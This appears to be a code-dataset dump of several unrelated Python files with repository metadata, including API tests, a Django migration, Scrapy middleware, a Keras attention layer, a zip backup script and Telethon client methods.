if __name__ == '__main__':
    # Entry point when run directly by the functional-test runner.
    WalletAccountsTest().main()
| true | true |
f72ea7749502804e63cabefce69af2c3762767e4 | 2,268 | py | Python | server/tests/test_patients.py | ishitakapoor26/Nutrihelp | 5bac42aaee61884f9ee7415caf441e80b7b03b48 | [
"MIT"
] | 22 | 2021-02-15T10:30:59.000Z | 2022-01-09T07:10:36.000Z | server/tests/test_patients.py | Ayonijakaushik19/Nutrihelp | 85926b187a6bfcf80f1f1cd60667ed3d14dce0be | [
"MIT"
] | 51 | 2021-02-27T15:42:15.000Z | 2022-03-01T15:02:03.000Z | server/tests/test_patients.py | Ayonijakaushik19/Nutrihelp | 85926b187a6bfcf80f1f1cd60667ed3d14dce0be | [
"MIT"
] | 25 | 2021-02-14T17:49:23.000Z | 2022-02-27T18:27:39.000Z | from bson.json_util import dumps
from ..app import app
from json import dumps as pretty
class glo:
    """Mutable test state shared across the test functions in this module."""
    # Patient id dicts collected by test_get_all_patients and reused by
    # the get/update/delete tests.
    patient_id = []


# Shared instance; note patient_id is a class attribute, so it is shared.
g = glo()
# Test user ids: the first is deliberately malformed; the second looks like
# a 24-hex-char Mongo ObjectId (assumed — confirm against the API).
userid = ['1k33224', '60961d77a7090edb5b69c62c']

# Payload used when creating patients.
patient = {
    'name': 'Abhishek shrivastava',
    'age': 19,
    'gender': 'M',
    'mobile': '9022930339',
}

# Payload used when updating patients (includes a stats sub-document).
patient2 = {
    'name': 'Avinash',
    'age': 39,
    'gender': 'M',
    'mobile': '2992123212',
    'stats': {
        'bp': 223,
        'glucose': 213,
        'weight': 922,
    },
}

# One creation request per user id, both reusing the same patient payload.
data = [
    {'userid': userid[0], 'patient': patient},
    {'userid': userid[1], 'patient': patient},
]
def pprint(data):
    """Pretty-print *data* as sorted, indented JSON (uses json.dumps alias)."""
    print(pretty(data, sort_keys=True, indent=4))
def test_add_patient():
    """POST each (userid, patient) pair to /patients and expect HTTP 200."""
    with app.test_client() as client:
        uri = '/patients'  # invariant, hoisted out of the loop
        for item in data:
            res = client.post(uri, json=item)
            pprint(res.json)
            assert res.status_code == 200
def test_get_all_patients():
    """GET /patients/<userid> and stash the returned patient ids in glo."""
    with app.test_client() as client:
        for uid in userid:  # renamed from `id` to avoid shadowing the builtin
            res = client.get('/patients/' + uid)
            pprint(res.json)
            if isinstance(res.json, list):
                g.patient_id = [d.get('id') for d in res.json]
                # Also probe with the second user id wrapped as an ObjectId
                # dict (assumed to be inside this branch — indentation was
                # lost in extraction; confirm).
                g.patient_id.append({'$oid': userid[1]})
            assert res.status_code == 200
def test_patient_get():
    """GET every (userid, patient_id) combination and expect HTTP 200."""
    with app.test_client() as client:
        for uid in userid:
            for pid in g.patient_id:
                uri = '/patients/' + uid + '/' + pid['$oid']
                res = client.get(uri)
                pprint(res.json)
                assert res.status_code == 200
def test_patient_update():
    """PUT ``patient2`` to every stored patient record and expect HTTP 200."""
    with app.test_client() as client:
        for uid in userid:
            for pid in g.patient_id:
                endpoint = '/patients/{}/{}'.format(uid, pid['$oid'])
                response = client.put(endpoint, json=patient2)
                pprint(response.json)
                assert response.status_code == 200
def test_patient_delete():
    """DELETE every stored patient record and expect HTTP 200."""
    with app.test_client() as client:
        for uid in userid:
            for pid in g.patient_id:
                endpoint = '/patients/{}/{}'.format(uid, pid['$oid'])
                response = client.delete(endpoint)
                pprint(response.json)
                assert response.status_code == 200
def test_patient_get_after_delete():
    """Re-run the per-patient GET assertions after the delete test.

    NOTE(review): this still expects HTTP 200 (via ``test_patient_get``)
    even though the records were just deleted -- confirm the API really
    responds 200 for missing patients.
    """
    test_patient_get()
| 23.142857 | 64 | 0.53351 | from bson.json_util import dumps
from ..app import app
from json import dumps as pretty
class glo:
patient_id = []
g = glo()
userid = ['1k33224', '60961d77a7090edb5b69c62c']
patient = {
'name': 'Abhishek shrivastava',
'age': 19,
'gender': 'M',
'mobile': '9022930339'
}
patient2 = {
'name': 'Avinash',
'age': 39,
'gender': 'M',
'mobile': '2992123212',
'stats': {
'bp': 223,
'glucose': 213,
'weight': 922
}
}
data = [{
'userid': userid[0],
'patient':patient,
},
{
'userid': userid[1],
'patient':patient,
}]
def pprint(data):
print(pretty(data, sort_keys=True, indent=4))
def test_add_patient():
with app.test_client() as client:
for item in data:
uri = '/patients'
res = client.post(uri, json=item)
pprint(res.json)
assert res.status_code == 200
def test_get_all_patients():
with app.test_client() as client:
for id in userid:
res = client.get('/patients/'+id)
pprint(res.json)
if type(res.json) == list:
g.patient_id = [(d.get('id')) for d in res.json]
g.patient_id.append({'$oid': userid[1]})
assert res.status_code == 200
def test_patient_get():
with app.test_client() as client:
for uid in userid:
for pid in g.patient_id:
uri = '/patients/' + uid+'/'+pid['$oid']
res = client.get(uri)
pprint(res.json)
assert res.status_code == 200
def test_patient_update():
with app.test_client() as client:
for uid in userid:
for pid in g.patient_id:
uri = '/patients/'+uid+'/'+pid['$oid']
res = client.put(uri, json=patient2)
pprint(res.json)
assert res.status_code == 200
def test_patient_delete():
with app.test_client() as client:
for uid in userid:
for pid in g.patient_id:
uri = '/patients/'+uid+'/'+pid['$oid']
res = client.delete(uri)
pprint(res.json)
assert res.status_code == 200
def test_patient_get_after_delete():
test_patient_get()
| true | true |
f72ea7d8dd96b72bf999b8d29730d781aa003ace | 321 | py | Python | main/migrations/0002_remove_project_created_date.py | NancyWachiuri/AwardsApp | c4eb0a87ab528c2166d1bd27e3ec6302e7ef08df | [
"MIT"
] | null | null | null | main/migrations/0002_remove_project_created_date.py | NancyWachiuri/AwardsApp | c4eb0a87ab528c2166d1bd27e3ec6302e7ef08df | [
"MIT"
] | null | null | null | main/migrations/0002_remove_project_created_date.py | NancyWachiuri/AwardsApp | c4eb0a87ab528c2166d1bd27e3ec6302e7ef08df | [
"MIT"
] | null | null | null | # Generated by Django 3.2.8 on 2021-11-05 00:54
from django.db import migrations
class Migration(migrations.Migration):
    """Drop the obsolete ``created_date`` field from the ``main.Project`` model."""
    # Must be applied after the app's initial schema migration.
    dependencies = [
        ('main', '0001_initial'),
    ]
    operations = [
        migrations.RemoveField(
            model_name='project',
            name='created_date',
        ),
    ]
| 17.833333 | 47 | 0.582555 |
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('main', '0001_initial'),
]
operations = [
migrations.RemoveField(
model_name='project',
name='created_date',
),
]
| true | true |
f72ea823aa4b99280f01169d6a40994760c8465e | 3,674 | py | Python | 18.Web Scraping with Python Scrapy - RM/03_Advanced_Techniques/news_scraper_challenge/news_scraper_challenge/middlewares.py | ptyadana/python-dojo | 98c7234b84f0afea99a091c7198342d66bbdff5b | [
"MIT"
] | 3 | 2020-06-01T04:17:18.000Z | 2020-12-18T03:05:55.000Z | 18.Web Scraping with Python Scrapy - RM/03_Advanced_Techniques/news_scraper_challenge/news_scraper_challenge/middlewares.py | ptyadana/python-dojo | 98c7234b84f0afea99a091c7198342d66bbdff5b | [
"MIT"
] | 1 | 2020-04-25T08:01:59.000Z | 2020-04-25T08:01:59.000Z | 18.Web Scraping with Python Scrapy - RM/03_Advanced_Techniques/news_scraper_challenge/news_scraper_challenge/middlewares.py | ptyadana/python-dojo | 98c7234b84f0afea99a091c7198342d66bbdff5b | [
"MIT"
] | 7 | 2020-04-26T10:02:36.000Z | 2021-06-08T05:12:46.000Z | # Define here the models for your spider middleware
#
# See documentation in:
# https://docs.scrapy.org/en/latest/topics/spider-middleware.html
from scrapy import signals
# useful for handling different item types with a single interface
from itemadapter import is_item, ItemAdapter
class NewsScraperChallengeSpiderMiddleware:
    """Pass-through spider middleware (Scrapy project template).

    Every hook forwards its input unchanged; customise the individual
    methods to filter or transform responses, results or start requests.
    """

    @classmethod
    def from_crawler(cls, crawler):
        """Build the middleware and subscribe to the spider_opened signal."""
        middleware = cls()
        crawler.signals.connect(middleware.spider_opened,
                                signal=signals.spider_opened)
        return middleware

    def process_spider_input(self, response, spider):
        # Returning None lets every response continue into the spider.
        return None

    def process_spider_output(self, response, result, spider):
        # Forward every request/item produced by the spider untouched.
        yield from result

    def process_spider_exception(self, response, exception, spider):
        # Returning None defers to Scrapy's default exception handling.
        pass

    def process_start_requests(self, start_requests, spider):
        # Emit the start requests exactly as given.
        yield from start_requests

    def spider_opened(self, spider):
        spider.logger.info('Spider opened: %s' % spider.name)
class NewsScraperChallengeDownloaderMiddleware:
    """Pass-through downloader middleware (Scrapy project template).

    Requests, responses and exceptions are all handed on unchanged;
    customise the individual methods to intercept downloads.
    """

    @classmethod
    def from_crawler(cls, crawler):
        """Build the middleware and subscribe to the spider_opened signal."""
        middleware = cls()
        crawler.signals.connect(middleware.spider_opened,
                                signal=signals.spider_opened)
        return middleware

    def process_request(self, request, spider):
        # Returning None tells Scrapy to keep processing the request.
        return None

    def process_response(self, request, response, spider):
        # Hand the downloaded response back unchanged.
        return response

    def process_exception(self, request, exception, spider):
        # Returning None defers to the remaining exception handlers.
        pass

    def spider_opened(self, spider):
        spider.logger.info('Spider opened: %s' % spider.name)
| 35.326923 | 78 | 0.676647 |
from scrapy import signals
from itemadapter import is_item, ItemAdapter
class NewsScraperChallengeSpiderMiddleware:
@classmethod
def from_crawler(cls, crawler):
s = cls()
crawler.signals.connect(s.spider_opened, signal=signals.spider_opened)
return s
def process_spider_input(self, response, spider):
return None
def process_spider_output(self, response, result, spider):
for i in result:
yield i
def process_spider_exception(self, response, exception, spider):
pass
def process_start_requests(self, start_requests, spider):
for r in start_requests:
yield r
def spider_opened(self, spider):
spider.logger.info('Spider opened: %s' % spider.name)
class NewsScraperChallengeDownloaderMiddleware:
@classmethod
def from_crawler(cls, crawler):
s = cls()
crawler.signals.connect(s.spider_opened, signal=signals.spider_opened)
return s
def process_request(self, request, spider):
return None
def process_response(self, request, response, spider):
return response
def process_exception(self, request, exception, spider):
pass
def spider_opened(self, spider):
spider.logger.info('Spider opened: %s' % spider.name)
| true | true |
f72ea85064b2c2a6f54570529a6ce35ac41d67bd | 488 | py | Python | astronomy_datamodels/tests/test_subarray.py | spacetelescope/astronomy_datamodels | ca5db82d5982781ea763cef9851d4c982fd86328 | [
"BSD-3-Clause"
] | 1 | 2019-03-08T03:06:43.000Z | 2019-03-08T03:06:43.000Z | astronomy_datamodels/tests/test_subarray.py | spacetelescope/astronomy_datamodels | ca5db82d5982781ea763cef9851d4c982fd86328 | [
"BSD-3-Clause"
] | 1 | 2020-10-29T19:54:28.000Z | 2020-10-29T19:54:28.000Z | astronomy_datamodels/tests/test_subarray.py | spacetelescope/astronomy_datamodels | ca5db82d5982781ea763cef9851d4c982fd86328 | [
"BSD-3-Clause"
] | null | null | null | # Licensed under a 3-clause BSD style license - see LICENSE.rst
# -*- coding: utf-8 -*-
import pytest
import numpy as np
asdf = pytest.importorskip('asdf', minversion='2.0.0.dev0')
from asdf import util
from asdf.tests import helpers
from ..subarray import Subarray
def test1(tmpdir, ret=False):
subarray = Subarray(offset=(100, 131), size=(256, 256), name='SA1')
tree = {'subarray': subarray}
if ret:
return subarray
helpers.assert_roundtrip_tree(tree, tmpdir) | 28.705882 | 71 | 0.702869 |
import pytest
import numpy as np
asdf = pytest.importorskip('asdf', minversion='2.0.0.dev0')
from asdf import util
from asdf.tests import helpers
from ..subarray import Subarray
def test1(tmpdir, ret=False):
subarray = Subarray(offset=(100, 131), size=(256, 256), name='SA1')
tree = {'subarray': subarray}
if ret:
return subarray
helpers.assert_roundtrip_tree(tree, tmpdir) | true | true |
f72ea9c1cb6d29549be75d7beed55fe01e257814 | 707 | py | Python | tests/framework/RunFailures/failer.py | rinelson456/raven | 1114246136a2f72969e75b5e99a11b35500d4eef | [
"Apache-2.0"
] | 159 | 2017-03-24T21:07:06.000Z | 2022-03-20T13:44:40.000Z | tests/framework/RunFailures/failer.py | rinelson456/raven | 1114246136a2f72969e75b5e99a11b35500d4eef | [
"Apache-2.0"
] | 1,667 | 2017-03-27T14:41:22.000Z | 2022-03-31T19:50:06.000Z | tests/framework/RunFailures/failer.py | rinelson456/raven | 1114246136a2f72969e75b5e99a11b35500d4eef | [
"Apache-2.0"
] | 95 | 2017-03-24T21:05:03.000Z | 2022-03-08T17:30:22.000Z | # Copyright 2017 Battelle Energy Alliance, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
def run(self, Input):
    """Store ``self.x + self.y`` in ``self.ans``.

    Raises IOError (deliberately, for failure testing) whenever the sum
    is positive; ``Input`` is accepted for interface compatibility and
    ignored.
    """
    total = self.x + self.y
    if total > 0:
        raise IOError('Testing, testing, 1,2,3.')
    self.ans = total
| 39.277778 | 74 | 0.746818 |
def run(self,Input):
if self.x+self.y > 0:
raise IOError('Testing, testing, 1,2,3.')
self.ans = self.x+self.y
| true | true |
f72eaa3113edd3d25a929e626271bcff8fa160e6 | 1,162 | py | Python | ver-3/backup_ver3.py | Emmanuel-Temitope/backup-problem-solved | c5e10bc586c9fc449c6e13d08f9ad0d964105c67 | [
"MIT"
] | null | null | null | ver-3/backup_ver3.py | Emmanuel-Temitope/backup-problem-solved | c5e10bc586c9fc449c6e13d08f9ad0d964105c67 | [
"MIT"
] | null | null | null | ver-3/backup_ver3.py | Emmanuel-Temitope/backup-problem-solved | c5e10bc586c9fc449c6e13d08f9ad0d964105c67 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Sun Jun 9 18:52:56 2019
@author: Emmanuel-Temitope
"""
import os
import time
# Paths to back up.  The second entry carries its own quotes so the shell
# command assembled below treats it as a single argument.
source = [r'source', '"Another source"']
# All archives live under this directory, one subdirectory per day.
target_dir = r'target'
if not os.path.exists(target_dir):
    os.mkdir(target_dir)
today = target_dir + os.sep + time.strftime('%Y%m%d')
# The current time names the archive inside today's subdirectory.
now = time.strftime('%H%M%S')
# An optional user comment becomes part of the archive file name.
comment = input('Enter a comment --> ')
# Build the archive name; spaces in the comment become underscores.
if len(comment) == 0:
    target = today + os.sep + now + '.zip'
else:
    # NOTE(review): no '.zip' suffix on this branch; the external zip
    # utility appends one when the name has no extension -- confirm that
    # is the intended behaviour.
    target = today + os.sep + now + '_' + \
        comment.replace(" ", "_")
print(time.asctime())
# Create today's subdirectory on first use.
if not os.path.exists(today):
    os.mkdir(today)
    print('Successfully created directory', today)
# Delegate the actual archiving to the external 'zip' command.
zip_command = 'zip -r {0} {1}'.format(target, ' '.join(source))
# Run the backup and report the outcome (os.system returns 0 on success).
print('Zip command is: ')
print(zip_command)
print('Running...')
if os.system(zip_command) == 0:
    print('Successful backup to', target,'at ', time.asctime())
else:
    print('Backup FAILED')
| 22.784314 | 63 | 0.654905 |
import os
import time
source = [r'source', '"Another source"']
target_dir = r'target'
if not os.path.exists(target_dir):
os.mkdir(target_dir)
today = target_dir + os.sep + time.strftime('%Y%m%d')
now = time.strftime('%H%M%S')
comment = input('Enter a comment --> ')
if len(comment) == 0:
target = today + os.sep + now + '.zip'
else:
target = today + os.sep + now + '_' + \
comment.replace(" ", "_")
print(time.asctime())
if not os.path.exists(today):
os.mkdir(today)
print('Successfully created directory', today)
#we use the zip command to put the files in a zip archive
zip_command = 'zip -r {0} {1}'.format(target, ' '.join(source))
#Run the backup
print('Zip command is: ')
print(zip_command)
print('Running...')
if os.system(zip_command) == 0:
print('Successful backup to', target,'at ', time.asctime())
else:
print('Backup FAILED')
| true | true |
f72eaa8f5af2633482ecb8f03a085435a35f5fa3 | 4,852 | py | Python | archive/attention.py | emmettmeinzer/hmwgen | cd47733b5a34a6a3a9b56026eb5e73069e398033 | [
"MIT"
] | null | null | null | archive/attention.py | emmettmeinzer/hmwgen | cd47733b5a34a6a3a9b56026eb5e73069e398033 | [
"MIT"
] | null | null | null | archive/attention.py | emmettmeinzer/hmwgen | cd47733b5a34a6a3a9b56026eb5e73069e398033 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Thu Nov 5 22:53:44 2020
@author: Emmett
"""
import tensorflow as tf
import os
from tensorflow.python.keras.layers import Layer
from tensorflow.python.keras import backend as K
class AttentionLayer(Layer):
"""
This class implements Bahdanau attention (https://arxiv.org/pdf/1409.0473.pdf).
There are three sets of weights introduced W_a, U_a, and V_a
"""
    def __init__(self, **kwargs):
        # No state of our own; the weights are created lazily in ``build``.
        super(AttentionLayer, self).__init__(**kwargs)
    def build(self, input_shape):
        """Create the three attention weight matrices.

        *input_shape* is ``[encoder_output_shape, decoder_output_shape]``;
        index ``[i][2]`` is each sequence's feature dimension.
        """
        assert isinstance(input_shape, list)
        # W_a projects encoder states, U_a projects decoder states, and V_a
        # reduces the combined energies to one scalar per encoder step.
        self.W_a = self.add_weight(name='W_a',
                                   shape=tf.TensorShape((input_shape[0][2], input_shape[0][2])),
                                   initializer='uniform',
                                   trainable=True)
        self.U_a = self.add_weight(name='U_a',
                                   shape=tf.TensorShape((input_shape[1][2], input_shape[0][2])),
                                   initializer='uniform',
                                   trainable=True)
        self.V_a = self.add_weight(name='V_a',
                                   shape=tf.TensorShape((input_shape[0][2], 1)),
                                   initializer='uniform',
                                   trainable=True)
        super(AttentionLayer, self).build(input_shape)  # Keras requires this call at the end
    def call(self, inputs, verbose=False):
        """Compute Bahdanau attention over the encoder outputs.

        inputs: [encoder_output_sequence, decoder_output_sequence]
        Returns ``(context_vectors, attention_energies)``; the energies are
        produced by stepping over the decoder sequence with ``K.rnn``.
        """
        assert type(inputs) == list
        encoder_out_seq, decoder_out_seq = inputs
        if verbose:
            print('encoder_out_seq>', encoder_out_seq.shape)
            print('decoder_out_seq>', decoder_out_seq.shape)
        def energy_step(inputs, states):
            """ Step function for computing energy for a single decoder state
            inputs: (batchsize * 1 * de_in_dim)
            states: (batchsize * 1 * de_latent_dim)
            """
            assert_msg = "States must be an iterable. Got {} of type {}".format(states, type(states))
            assert isinstance(states, list) or isinstance(states, tuple), assert_msg
            """ Some parameters required for shaping tensors"""
            en_seq_len, en_hidden = encoder_out_seq.shape[1], encoder_out_seq.shape[2]
            de_hidden = inputs.shape[-1]
            """ Computing S.Wa where S=[s0, s1, ..., si]"""
            # <= batch size * en_seq_len * latent_dim
            W_a_dot_s = K.dot(encoder_out_seq, self.W_a)
            """ Computing hj.Ua """
            U_a_dot_h = K.expand_dims(K.dot(inputs, self.U_a), 1)  # <= batch_size, 1, latent_dim
            if verbose:
                print('Ua.h>', U_a_dot_h.shape)
            """ tanh(S.Wa + hj.Ua) """
            # <= batch_size*en_seq_len, latent_dim
            Ws_plus_Uh = K.tanh(W_a_dot_s + U_a_dot_h)
            if verbose:
                print('Ws+Uh>', Ws_plus_Uh.shape)
            """ softmax(va.tanh(S.Wa + hj.Ua)) """
            # <= batch_size, en_seq_len
            e_i = K.squeeze(K.dot(Ws_plus_Uh, self.V_a), axis=-1)
            # <= batch_size, en_seq_len
            e_i = K.softmax(e_i)
            if verbose:
                print('ei>', e_i.shape)
            return e_i, [e_i]
        def context_step(inputs, states):
            """ Step function for computing ci using ei """
            assert_msg = "States must be an iterable. Got {} of type {}".format(states, type(states))
            assert isinstance(states, list) or isinstance(states, tuple), assert_msg
            # Weighted sum of encoder states: <= batch_size, hidden_size
            c_i = K.sum(encoder_out_seq * K.expand_dims(inputs, -1), axis=1)
            if verbose:
                print('ci>', c_i.shape)
            return c_i, [c_i]
        # K.rnn needs initial states of the right shape; these "fake" states
        # are never read as values, only their shapes matter.
        fake_state_c = K.sum(encoder_out_seq, axis=1)
        fake_state_e = K.sum(encoder_out_seq, axis=2)  # <= (batch_size, enc_seq_len, latent_dim
        """ Computing energy outputs """
        # e_outputs => (batch_size, de_seq_len, en_seq_len)
        last_out, e_outputs, _ = K.rnn(
            energy_step, decoder_out_seq, [fake_state_e],
        )
        """ Computing context vectors """
        last_out, c_outputs, _ = K.rnn(
            context_step, e_outputs, [fake_state_c],
        )
        return c_outputs, e_outputs
def compute_output_shape(self, input_shape):
""" Outputs produced by the layer """
return [
tf.TensorShape((input_shape[1][0], input_shape[1][1], input_shape[1][2])),
tf.TensorShape((input_shape[1][0], input_shape[1][1], input_shape[0][1]))
] | 39.447154 | 102 | 0.543899 |
import tensorflow as tf
import os
from tensorflow.python.keras.layers import Layer
from tensorflow.python.keras import backend as K
class AttentionLayer(Layer):
def __init__(self, **kwargs):
super(AttentionLayer, self).__init__(**kwargs)
def build(self, input_shape):
assert isinstance(input_shape, list)
self.W_a = self.add_weight(name='W_a',
shape=tf.TensorShape((input_shape[0][2], input_shape[0][2])),
initializer='uniform',
trainable=True)
self.U_a = self.add_weight(name='U_a',
shape=tf.TensorShape((input_shape[1][2], input_shape[0][2])),
initializer='uniform',
trainable=True)
self.V_a = self.add_weight(name='V_a',
shape=tf.TensorShape((input_shape[0][2], 1)),
initializer='uniform',
trainable=True)
super(AttentionLayer, self).build(input_shape)
def call(self, inputs, verbose=False):
assert type(inputs) == list
encoder_out_seq, decoder_out_seq = inputs
if verbose:
print('encoder_out_seq>', encoder_out_seq.shape)
print('decoder_out_seq>', decoder_out_seq.shape)
def energy_step(inputs, states):
assert_msg = "States must be an iterable. Got {} of type {}".format(states, type(states))
assert isinstance(states, list) or isinstance(states, tuple), assert_msg
en_seq_len, en_hidden = encoder_out_seq.shape[1], encoder_out_seq.shape[2]
de_hidden = inputs.shape[-1]
W_a_dot_s = K.dot(encoder_out_seq, self.W_a)
U_a_dot_h = K.expand_dims(K.dot(inputs, self.U_a), 1)
if verbose:
print('Ua.h>', U_a_dot_h.shape)
Ws_plus_Uh = K.tanh(W_a_dot_s + U_a_dot_h)
if verbose:
print('Ws+Uh>', Ws_plus_Uh.shape)
e_i = K.squeeze(K.dot(Ws_plus_Uh, self.V_a), axis=-1)
e_i = K.softmax(e_i)
if verbose:
print('ei>', e_i.shape)
return e_i, [e_i]
def context_step(inputs, states):
assert_msg = "States must be an iterable. Got {} of type {}".format(states, type(states))
assert isinstance(states, list) or isinstance(states, tuple), assert_msg
c_i = K.sum(encoder_out_seq * K.expand_dims(inputs, -1), axis=1)
if verbose:
print('ci>', c_i.shape)
return c_i, [c_i]
fake_state_c = K.sum(encoder_out_seq, axis=1)
fake_state_e = K.sum(encoder_out_seq, axis=2)
last_out, e_outputs, _ = K.rnn(
energy_step, decoder_out_seq, [fake_state_e],
)
last_out, c_outputs, _ = K.rnn(
context_step, e_outputs, [fake_state_c],
)
return c_outputs, e_outputs
def compute_output_shape(self, input_shape):
return [
tf.TensorShape((input_shape[1][0], input_shape[1][1], input_shape[1][2])),
tf.TensorShape((input_shape[1][0], input_shape[1][1], input_shape[0][1]))
] | true | true |
f72eabe57eec9d5c6a19eec2a538f36cdca7eb4c | 637 | py | Python | src/cbapi/__init__.py | rlmaers/cbapi-python | 395763e609ba1338ff3c7540395a6f2804e94584 | [
"MIT"
] | 3 | 2019-01-23T19:11:33.000Z | 2022-02-25T02:06:51.000Z | src/cbapi/__init__.py | rlmaers/cbapi-python | 395763e609ba1338ff3c7540395a6f2804e94584 | [
"MIT"
] | null | null | null | src/cbapi/__init__.py | rlmaers/cbapi-python | 395763e609ba1338ff3c7540395a6f2804e94584 | [
"MIT"
] | 1 | 2022-02-25T02:06:52.000Z | 2022-02-25T02:06:52.000Z | from __future__ import absolute_import
import cbapi.six
__title__ = 'cbapi'
__author__ = 'Carbon Black Developer Network'
__license__ = 'MIT'
__copyright__ = 'Copyright 2018 Carbon Black'
__version__ = '1.3.6'
# New API as of cbapi 0.9.0
from cbapi.response.rest_api import CbEnterpriseResponseAPI, CbResponseAPI
from cbapi.protection.rest_api import CbEnterpriseProtectionAPI, CbProtectionAPI
from cbapi.psc.defense import CbDefenseAPI
from cbapi.psc.threathunter import CbThreatHunterAPI
from cbapi.psc.livequery import CbLiveQueryAPI
# for compatibility with Cb Defense code from cbapi < 1.4.0
import cbapi.psc.defense as defense
| 31.85 | 80 | 0.821036 | from __future__ import absolute_import
import cbapi.six
__title__ = 'cbapi'
__author__ = 'Carbon Black Developer Network'
__license__ = 'MIT'
__copyright__ = 'Copyright 2018 Carbon Black'
__version__ = '1.3.6'
from cbapi.response.rest_api import CbEnterpriseResponseAPI, CbResponseAPI
from cbapi.protection.rest_api import CbEnterpriseProtectionAPI, CbProtectionAPI
from cbapi.psc.defense import CbDefenseAPI
from cbapi.psc.threathunter import CbThreatHunterAPI
from cbapi.psc.livequery import CbLiveQueryAPI
import cbapi.psc.defense as defense
| true | true |
f72eac1b900c7f609802611bd21042c02362d0e3 | 16,499 | py | Python | telethon/client/users.py | polisitni1/DogeClickBot | ac57eaeefca2c6ab9e48458f9f928a6a421a162e | [
"MIT"
] | null | null | null | telethon/client/users.py | polisitni1/DogeClickBot | ac57eaeefca2c6ab9e48458f9f928a6a421a162e | [
"MIT"
] | null | null | null | telethon/client/users.py | polisitni1/DogeClickBot | ac57eaeefca2c6ab9e48458f9f928a6a421a162e | [
"MIT"
] | null | null | null | import asyncio
import itertools
import logging
import time
from .telegrambaseclient import TelegramBaseClient
from .. import errors, utils
from ..tl import TLObject, TLRequest, types, functions
__log__ = logging.getLogger(__name__)
_NOT_A_REQUEST = TypeError('You can only invoke requests, not types!')
class UserMethods(TelegramBaseClient):
    async def __call__(self, request, ordered=False):
        """Invoke one (or a list of) raw Telegram API requests.

        Validates that every item is a ``TLRequest``, honours any pending
        flood-wait penalty recorded for its constructor, then sends the
        request(s), retrying up to ``self._request_retries`` times on
        transient server errors, flood waits and datacenter migrations.
        Raises ``ValueError`` when all retries are exhausted.
        """
        for r in (request if utils.is_list_like(request) else (request,)):
            if not isinstance(r, TLRequest):
                raise _NOT_A_REQUEST
            await r.resolve(self, utils)
            # Avoid making the request if it's already in a flood wait
            if r.CONSTRUCTOR_ID in self._flood_waited_requests:
                due = self._flood_waited_requests[r.CONSTRUCTOR_ID]
                diff = round(due - time.time())
                if diff <= 3:  # Flood waits below 3 seconds are "ignored"
                    self._flood_waited_requests.pop(r.CONSTRUCTOR_ID, None)
                elif diff <= self.flood_sleep_threshold:
                    __log__.info('Sleeping early for %ds on flood wait', diff)
                    await asyncio.sleep(diff, loop=self._loop)
                    self._flood_waited_requests.pop(r.CONSTRUCTOR_ID, None)
                else:
                    raise errors.FloodWaitError(capture=diff)
        request_index = 0
        self._last_request = time.time()
        for _ in range(self._request_retries):
            try:
                future = self._sender.send(request, ordered=ordered)
                if isinstance(future, list):
                    # A list of requests yields a list of futures; collect
                    # each result and feed any found entities to the session.
                    results = []
                    for f in future:
                        result = await f
                        self.session.process_entities(result)
                        results.append(result)
                        request_index += 1
                    return results
                else:
                    result = await future
                    self.session.process_entities(result)
                    return result
            except (errors.ServerError, errors.RpcCallFailError) as e:
                # Transient server-side failure: log and retry.
                __log__.warning('Telegram is having internal issues %s: %s',
                                e.__class__.__name__, e)
            except (errors.FloodWaitError, errors.FloodTestPhoneWaitError) as e:
                # request_index points at the request that actually failed
                # when a list was sent; remember its flood-wait deadline.
                if utils.is_list_like(request):
                    request = request[request_index]
                self._flood_waited_requests\
                    [request.CONSTRUCTOR_ID] = time.time() + e.seconds
                if e.seconds <= self.flood_sleep_threshold:
                    __log__.info('Sleeping for %ds on flood wait', e.seconds)
                    await asyncio.sleep(e.seconds, loop=self._loop)
                else:
                    raise
            except (errors.PhoneMigrateError, errors.NetworkMigrateError,
                    errors.UserMigrateError) as e:
                __log__.info('Phone migrated to %d', e.new_dc)
                should_raise = isinstance(e, (
                    errors.PhoneMigrateError, errors.NetworkMigrateError
                ))
                if should_raise and await self.is_user_authorized():
                    raise
                await self._switch_dc(e.new_dc)
        raise ValueError('Number of retries reached 0')
# region Public methods
    async def get_me(self, input_peer=False):
        """
        Gets "me" (the self user) which is currently authenticated,
        or None if the request fails (hence, not authenticated).

        Args:
            input_peer (`bool`, optional):
                Whether to return the :tl:`InputPeerUser` version or the normal
                :tl:`User`. This can be useful if you just need to know the ID
                of yourself.

        Returns:
            Your own :tl:`User`.
        """
        # Serve the cached input peer when possible to avoid a network call.
        if input_peer and self._self_input_peer:
            return self._self_input_peer
        try:
            me = (await self(
                functions.users.GetUsersRequest([types.InputUserSelf()])))[0]
            # Cache the input-peer form for subsequent fast lookups.
            if not self._self_input_peer:
                self._self_input_peer = utils.get_input_peer(
                    me, allow_self=False
                )
            return self._self_input_peer if input_peer else me
        except errors.UnauthorizedError:
            # Not logged in; the documented contract is to return None.
            return None
async def is_user_authorized(self):
"""
Returns ``True`` if the user is authorized.
"""
if self._self_input_peer is not None or self._state.pts != -1:
return True
try:
self._state = await self(functions.updates.GetStateRequest())
return True
except errors.RPCError:
return False
    async def get_entity(self, entity):
        """
        Turns the given entity into a valid Telegram :tl:`User`, :tl:`Chat`
        or :tl:`Channel`. You can also pass a list or iterable of entities,
        and they will be efficiently fetched from the network.

        entity (`str` | `int` | :tl:`Peer` | :tl:`InputPeer`):
            If an username is given, **the username will be resolved** making
            an API call every time. Resolving usernames is an expensive
            operation and will start hitting flood waits around 50 usernames
            in a short period of time.

            If you want to get the entity for a *cached* username, you should
            first `get_input_entity(username) <get_input_entity>` which will
            use the cache), and then use `get_entity` with the result of the
            previous call.

            Similar limits apply to invite links, and you should use their
            ID instead.

            Using phone numbers, exact names, integer IDs or :tl:`Peer`
            rely on a `get_input_entity` first, which in turn needs the
            entity to be in cache, unless a :tl:`InputPeer` was passed.

            Unsupported types will raise ``TypeError``.

            If the entity can't be found, ``ValueError`` will be raised.

        Returns:
            :tl:`User`, :tl:`Chat` or :tl:`Channel` corresponding to the
            input entity. A list will be returned if more than one was given.
        """
